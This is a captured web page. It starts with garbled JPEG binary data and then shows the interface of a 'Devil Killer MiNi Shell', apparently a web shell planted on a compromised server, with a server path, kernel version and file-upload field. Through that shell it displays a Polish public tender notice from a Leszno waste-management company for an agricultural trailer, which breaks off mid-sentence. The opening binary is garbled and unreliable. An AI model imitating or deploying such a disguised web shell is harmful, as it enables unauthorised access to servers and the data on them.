JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250224/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250224/0011677001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup wraz z dostawą fabrycznie nowej przyczepy skorupowej rolniczej z tylnym opróżnianiem hydraulicznym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZAKŁAD OCZYSZCZANIA SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411416981</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Saperska 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leszno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">601285720</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mzoleszno.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzoleszno.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup wraz z dostawą fabrycznie nowej przyczepy skorupowej rolniczej z tylnym opróżnianiem hydraulicznym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1d6d8953-dbe8-497d-b133-863bd57c244d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00116770</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mzo_leszno/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mzo_leszno/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, z uwzględnieniem wyjątków określonych w p.z.p. odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18.7.2002r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Osobą uprawnioną do kontaktu z Wykonawcami jest Sławomir Konieczny.<br/>3. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformy zakupowej Open Nexus: https://platformazakupowa.pl/pn/mzo_leszno/proceedings<br/>4. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcą w szczególności składanie oświadczeń, wniosków o wyjaśnienie SWZ, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem platformy zakupowej Open Nexus https://platformazakupowa.pl/pn/mzo_leszno/proceedings i formularza „Wyślij<br/>wiadomość do Zamawiającego” dostępnego na stronie dotyczącej danego postępowania. W sytuacjach awaryjnych, np. w przypadku niedziałania platformy zakupowej Zamawiający może się kontaktować z Wykonawcami za pomocą poczty elektronicznej.<br/>5. W korespondencji kierowanej do Zamawiającego Wykonawca winien posługiwać się numerem ogłoszenia (BZP, TED lub ID<br/>postępowania).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/mzo_leszno/proceedings</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dn. 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE. L. z 2016 r. Nr 119, str. 1 z późn. zm.), dalej RODO, informujemy, że:<br/>1. Administratorem Państwa danych osobowych jest Miejski Zakład Oczyszczania Sp. z o.o., ul. Saperska 23, 64-100 Leszno, tel.<br/>65/529 90 96;<br/>2. Kontakt do Inspektora Ochrony Danych Osobowych: iodo@mzoleszno.com.pl, 65/525 92 80;<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu powiązanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonego w trybie podstawowym pn. „Odbiór i zagospodarowanie odpadów o kodzie 15 01<br/>10*” ZP.PP.10.2024.<br/>4. Odbiorcami Państwa danych osobowych będą podmioty lub osoby, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 p.z.p.;<br/>5. Państwa dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 p.z.p. przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. Obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym<br/>określonym w przepisach p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z p.z.p.;<br/>7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO;<br/>8. Posiadają Państwo:<br/>a. Na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>b. Na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych;<br/>c. Na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków o których mowa w art. 18 ust. 2 RODO;<br/>d. Prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych<br/>osobowych Państwa dotyczących narusza przepisy RODO;<br/>9. Nie przysługuje Państwu:<br/>a. W związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b. Prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>c. Na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.PP.02.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup wraz z dostawą fabrycznie nowej przyczepy skorupowej rolniczej z tylnym opróżnianiem hydraulicznym. <br/>1.	Wymagania ogólne<br/>1.1.	Dostarczona przyczepa musi być fabrycznie nowa, wyprodukowane w 2024-2025 roku.<br/>1.2.	Termin realizacji umowy po podpisaniu – maksymalnie 45 dni. <br/>1.3.	Dostarczone przyczepa winne być przystosowane do pracy w ciężkim terenie.<br/>1.4.	Przyczepa winne pochodzić z produkcji seryjnej, nie stanowić prototypu.<br/>1.5.	Dostarczone przyczepa musi być przygotowane do eksploatacji i przystosowane do poruszania się po drodze. <br/>1.6.	Wraz z dostawą przyczepy, Wykonawca zobowiązany jest dostarczyć:<br/>a)	świadectwo zgodności CE,<br/>b)	książkę gwarancyjną przyczepy,<br/>c)	instrukcję obsługi przyczepy (DTR) w języku polskim,<br/>d)	katalog części zamiennych z rysunkami i numerami części w wersji papierowej i na nośniku CD/DVD,<br/>e)	pełną dokumentację do rejestracji<br/>f)	inne dokumenty niezbędne do eksploatacji pojazdu.<br/>1.7.	Wykonawca zobowiązany jest dysponować lub współpracować, z co najmniej 1 stacją serwisową oddaloną o nie więcej niż 50 km od Zakładu Zagospodarowania Odpadów w Trzebani, gm. Osieczna.<br/>1.8.	Wykonawca zobowiązany jest udzielić gwarancji na dostarczany sprzęt na okres nie krótszy niż 24 miesiące I 24 miesięcy na elementy hydrauliki siłowej. Bieg terminu gwarancji rozpoczyna się w dniu podpisania bez uwag protokołu zdawczo-odbiorczego przedmiotu zamówienia. <br/>1.9.	W przypadku wystąpienia jakichkolwiek usterek w trakcie trwania okresu gwarancji Wykonawca winien zapewnić czas reakcji serwisu w ciągu 48h, licząc od przyjęcia pisemnego zgłoszenia Zamawiającego dotyczącego konieczności serwisu. W razie naprawy trwającej dłużej niż 72 h Wykonawca udostępni Zamawiającemu na czas naprawy użytkową przyczepę zastępczo o parametrach możliwie zbliżonych. Za równoważne z formą pisemną uznaje się wysłanie wiadomości e-mail na adres mailowy Wykonawcy. Wykonawca naprawi wady w terminie wskazanym przez Zamawiającego. <br/>1.10.	Usunięcie wad powinno nastąpić w jednej ze stacji obsługi przyczepy, o których mowa w pkt 1.7. lub innej autoryzowanej stacji obsługi pojazdów wskazanej przez Wykonawcę. Koszt dostarczenia sprzętu do/z miejsca pracy pojazdu, tj. Zakładu Zagospodarowania Odpadów w Trzebani, ponosi Wykonawca.<br/>1.11.	Wykonawca zapewni szkolenie pracowników Zamawiającego z zakresu eksploatacji dostarczonego sprzętu.<br/>2.	Wymagania szczegółowe<br/>Zamawiający wymaga dostawy przyczepy spełniającej następujące parametry:<br/>2.1.	Parametry robocze, techniczne:<br/>	Dopuszczalna ładowność homologowana min. 15 000kg,<br/>	Masła własna od 6 300 do 7 000kg, <br/>	Ładowność techniczna około 18 000kg,<br/>	Dopuszczalna masa całkowita od 22 000kg do 24 000kg,<br/>	Nacisk na sprzęg kulowy 4 000kg,<br/>	Pojemność od 22 m3 do 32 m3, <br/>	Rama w całości ocynkowana,<br/>	Dyszel ocynkowany – amortyzowany hydropneumatycznie<br/>	Zaczep kulowy K80,<br/>	Zawieszenie paraboliczne,<br/>	Osie pod resorem,<br/>	Osie paraboliczne,<br/>	Bęben hamulcowy o wymiarach min. 406x140 mm,<br/>	Ogumienie szerokie min.650/55 R 26.5 / max. <br/>	Nośność koła minimum 7 900kg przy 40 km/h<br/>	Skrzynia o wymiarach długości min 6800 wysokość burt min 1700 mm,<br/>	Maksymalna wysokość przyczepy bez nadstaw max. 2930 mm z nadstawami max. 3570 mm<br/>	2 osie hamujące: przednia sztywna, tylna skręcana, nadążna blokowana hydraulicznie,<br/>	Tylna klapa standardowa, hydrauliczna,<br/>	Wersja 40km/h z homologacją,<br/>2.2.	Osprzęt:<br/>	Błotniki kół,<br/>	Tylny zderzak przykręcany z możliwością odkręcenia,<br/>	Aluminiowa drabina przednia,<br/>	Noga podporowa mechaniczna,<br/>	Oświetlenie drogowe LED 12V,<br/>	Oświetlenie boczne obrysowe,<br/>	Koło zapasowe min.650/55 R 26.5 /<br/>2.3.	Przekazanie przedmiotu zamówienia:<br/>1)	Przekazanie Zamawiającemu przedmiotu dostawy nastąpi na podstawie protokołu przekazania przedmiotu zamówienia. <br/>2)	Podczas przekazywania sprzętu, Wykonawca musi zapewnić odpowiednią ilość doświadczonego i wykwalifikowanego Personelu Wykonawcy. <br/>3)	Odbiór przez Zamawiającego przedmiotu zamówienia nastąpi po wywiązaniu się przez Wykonawcę ze wszystkich zobowiązań wynikających z umowy i po podpisaniu przez Zamawiającego końcowego protokołu zdawczo-odbiorczego przedmiotu zamówienia „bez uwag/zastrzeżeń.<br/>2.4.	Wymogi dla okresu gwarancji i rękojmi. <br/>1)	Wykonawca zobowiązuje się udzielić gwarancji i rękojmi dla dostarczonego przedmiotu: 24 m-cy, od daty podpisania przez Zamawiającego końcowego protokołu odbioru przedmiotu dostawy bez uwag/zastrzeżeń oraz pakiet przeglądów nadwozia i zabudowy był uwzględniony kontrakcie serwisowym.<br/>2)	Gwarancja, musi zapewniać wszelkie naprawy i usuwanie wszystkich usterek, jakie powstaną w okresie gwarancyjnym, za wyjątkiem uszkodzeń mechanicznych spowodowanych przez Zamawiającego, które zostaną usunięte na koszt Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">16500000-0 - Przyczepy lub naczepy samozaładowcze i wyładowcze do celów rolniczych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">3.	Zamawiający, do oceny ofert będzie brał pod uwagę:<br/>Cena oferty brutto (C) – waga kryterium 50%<br/>Termin dostawy od dnia zawarcia umowy (T) – waga kryterium 50%<br/>4.	Zasady oceny kryterium:<br/>a)	według kryterium oceny ofert „Cena oferty brutto (C)” każda oferta podlegająca ocenie otrzyma ilość punktów, zaokrągloną do dwóch miejsc po przecinku, wynikającą z następującego algorytmu:<br/> najniższa całkowita cena ofertowa brutto<br/>C= ------------------------------------------------------------------- x 100 x 50 %<br/> cena brutto ocenianej oferty<br/>Podstawą przyznania punktów w powyższym kryterium „cena oferty brutto” będzie cena ofertowa brutto podana przez Wykonawcę w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ.<br/>b)	według kryterium oceny ofert „Termin dostawy od dnia zawarcia umowy (T)” każda oferta podlegająca ocenie otrzyma ilość punktów zgodnie z poniższym opisem:<br/>Oferowany termin dostawy od dnia zawarcia umowy:<br/>15 dni – 50 pkt<br/>30 dni – 25 pkt<br/>45 dni – 0 pkt<br/>Podstawą przyznania punktów w powyższym kryterium „termin dostawy od dnia zawarcia umowy” będzie termin podany przez Wykonawcę w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ.<br/>Uwaga! <br/>A.	Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 PZP w przypadku gdy Wykonawca zaoferuje termin dostawy dłuższy niż 45 dni.<br/>B.	W przypadku braku podania przez Wykonawcę w formularzu ofertowym deklarowanego terminu dostawy Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5 PZP.<br/>C.	W przypadku podania przez Wykonawcę w formularzu ofertowym deklarowanego terminu dostawy krótszego niż 3 miesiące Zamawiający uzna, że Wykonawca zaoferował termin: „3 miesiące” i oceni ofertę z uwzględnieniem takiego okresu realizacji danego zgłoszenia, z zastrzeżeniem pkt D poniżej. <br/>D.	Zaoferowany przez Wykonawcę termin dostawy będzie wiążący dla stron na etapie realizacji umowy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy od dnia zawarcia umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielnie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na zasadach określonych w Rozdziale VIII SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	Warunki udziału w postępowaniu dotyczące:<br/>2.1.	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w tym zakresie;<br/>2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w tym zakresie;<br/>2.3.	sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w tym zakresie;<br/>2.4.	zdolności technicznej lub zawodowej: Wykonawca spełni warunek jeżeli wykaże, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie: minimum jedną dostawę polegającą na dostarczeniu fabrycznie nowej przyczepy skorupowej rolniczej z tylnym opróżnianiem hydraulicznym, o dopuszczalnej masie całkowitej od 22 000 kg do 24 000 kg, o wartości nie mniejszej niż 130 000,00 PLN brutto, <br/>oraz załączy dowody potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie;<br/>UWAGA!<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców przedmiotowa decyzja musi być złożona przez tego z Wykonawców, który faktycznie będzie realizował część zamówienia objętą koniecznością posiadania powyższego uprawnienia.<br/>UWAGA!<br/>W przypadku, gdy jakakolwiek wartość dotycząca warunku udziału w postępowaniu wyrażona będzie w walucie obcej, zamawiający przeliczy tę wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego (za datę wszczęcia postępowania zamawiający uznaje datę umieszczenia ogłoszenia o zamówieniu w miejscu publicznie dostępnym w swojej siedzibie oraz na stronie internetowej). Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.<br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej oraz sytuacji ekonomicznej lub finansowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych w lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2)	w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>a)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>a)	oświadczenie 